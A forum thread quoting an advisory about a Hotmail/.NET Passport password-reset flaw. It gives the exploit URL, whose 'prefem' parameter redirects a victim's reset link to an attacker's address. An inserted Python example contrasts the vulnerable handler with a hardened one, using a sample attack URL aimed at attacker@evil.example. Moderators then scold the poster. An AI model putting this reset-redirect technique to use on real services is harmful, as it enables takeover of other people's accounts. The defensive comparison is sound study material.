xisto Community
me-here1405241520

Password Reset Vulnerability


is it working now...?

An attacker can reset any Microsoft Hotmail/.Net Passport user account with no prior information like state, zip, country, answer to the secret question and the old password. Normally, a user has to answer the security questions and then answer the secret question if he wants to reset his password. By exploiting this vulnerability, an attacker can submit a specially crafted URL to get the password reset instructions and reset any user's password.

TECHNICAL DETAILS

Due to the nature of this vulnerability and the fact that there is no fix available yet, no technical details are being made available with this advisory. Full technical details will be made available on our website once the vulnerability is fixed by Microsoft. Please note that we were forced to release this information publicly as these vulnerabilities are actively being exploited in the wild and are one of the most severe vulnerabilities ever found in Microsoft Hotmail/.Net Passport.


The flaw is exploited by opening the following URL in a web browser:

http://forums.xisto.com/no_longer_exists/
&em=victim@hotmail.com&id=&cb=&prefem=where-to@send-the-email.com&rst=

After that, the URL which resets the password will be delivered, in this case, to where-to@send-the-email.com.


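The mechanism the quoted advisory describes, a reset endpoint that mails the reset link to whatever address the client puts in `prefem` and never checks the secret question, as an added example in Python. This is not code from the original post or from Microsoft; only the parameter names `em` and `prefem` come from the quoted URL. The host name `passport.example`, the account store, the secret-answer check, the token format and the 15-minute expiry are all assumptions. The vulnerable handler sits beside a hardened one that takes the destination from the account record, requires the secret answer, and issues a single-use, time-limited token.

```python
"""Added example (not from the post or from Microsoft): a simulated
password-reset endpoint with the flaw the advisory describes, beside a
hardened version. Host, account store and token handling are assumptions;
only the parameter names em/prefem come from the quoted URL."""
import hmac
import secrets
import time
from urllib.parse import parse_qs, urlsplit

# Constructed sample account store (hypothetical, not Passport's data).
ACCOUNTS = {
    "victim@hotmail.com": {
        "alternate_email": "victim-backup@example.net",
        "secret_answer": "fluffy",
    },
}

SENT = []      # every mail the simulated mailer "sends": (recipient, body)
PENDING = {}   # outstanding reset tokens: token -> (account, expires_at)

# Constructed attack URL shaped like the one quoted in the post; the host is
# hypothetical and the advisory's original path is not reproduced here.
ATTACK_URL = ("https://passport.example/reset"
              "?em=victim@hotmail.com&id=&cb=&prefem=attacker@evil.example&rst=")


def parse_reset_request(url):
    """Return the query parameters of a reset URL as a flat dict."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in query.items()}


def vulnerable_reset(url):
    """Mirrors the reported flaw: no secret question is checked and the reset
    link is mailed to whatever address the *client* put in 'prefem'.
    Returns the address the link was sent to (None for unknown accounts)."""
    p = parse_reset_request(url)
    account = p.get("em", "")
    if account not in ACCOUNTS:
        return None
    token = secrets.token_urlsafe(32)
    recipient = p.get("prefem", "")          # attacker-controlled destination
    SENT.append((recipient, f"https://passport.example/reset?em={account}&token={token}"))
    return recipient


def hardened_reset(url, secret_answer, now=None):
    """Fixed version: the destination comes from the account record, never from
    the request, and a link is issued only after the secret answer matches.
    Returns the recipient address, or None on any failure."""
    p = parse_reset_request(url)
    acct = ACCOUNTS.get(p.get("em", ""))
    # Same None for unknown accounts and wrong answers, and a constant-time
    # compare, so the endpoint leaks nothing about which addresses exist.
    expected = acct["secret_answer"] if acct else ""
    if not hmac.compare_digest(expected.encode(), secret_answer.encode()) or acct is None:
        return None
    token = secrets.token_urlsafe(32)
    now = time.time() if now is None else now
    PENDING[token] = (p["em"], now + 15 * 60)   # short-lived, bound to one account
    recipient = acct["alternate_email"]          # 'prefem' is ignored entirely
    SENT.append((recipient, f"https://passport.example/reset?token={token}"))
    return recipient


def redeem_token(token, now=None):
    """Single-use, time-limited redemption. Returns the account whose password
    may now be changed, or None if the token is unknown, used or expired."""
    now = time.time() if now is None else now
    entry = PENDING.pop(token, None)             # pop: a token works only once
    if entry is None:
        return None
    account, expires_at = entry
    return account if now <= expires_at else None


def last_issued_token():
    """Token embedded in the most recently sent reset link (for the demo)."""
    return parse_reset_request(SENT[-1][1])["token"]


if __name__ == "__main__":
    print("vulnerable ->", vulnerable_reset(ATTACK_URL))
    print("hardened, wrong answer ->", hardened_reset(ATTACK_URL, "guess"))
    print("hardened, right answer ->", hardened_reset(ATTACK_URL, "fluffy"))
    print("redeem once ->", redeem_token(last_issued_token()))
    print("redeem again ->", redeem_token(last_issued_token()))
```

The point to take from the two handlers is that the destination of a reset mail must never be derived from the request. The hardened version also answers identically for an unknown account and a wrong answer, and makes the token single-use and short-lived, so a link that does leak (mail forwarding, a shared inbox) is worth little for long.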

For God's sake, try and provide SOME ORIGINAL INPUT ON YOUR OWN PART. I'm getting tired of warning you and deleting such posts. Don't you have any goddamned opinion on anything on your own? Or do you simply specialize in posting quoted material from other sites?


Yes, the ability to reset a password on the hotmail/msn network is possible, much like the quoted material you posted states. They are currently working on, or have fixed, that problem already. As for how to do it, that's above my knowledge level, or to be more precise, not what I like to do for fun on my evenings off. As for the post... I have to agree with M^E, of the couple of posts of yours that I have run across they are, umm... juvenile at best, or in my opinion just this side of spam. Please feel free to contribute to the community, I would love to see you become a strong member here, but please don't post like this anymore, otherwise M^E, Moonwitch, or another of the mods might decide that banning might be the best option.
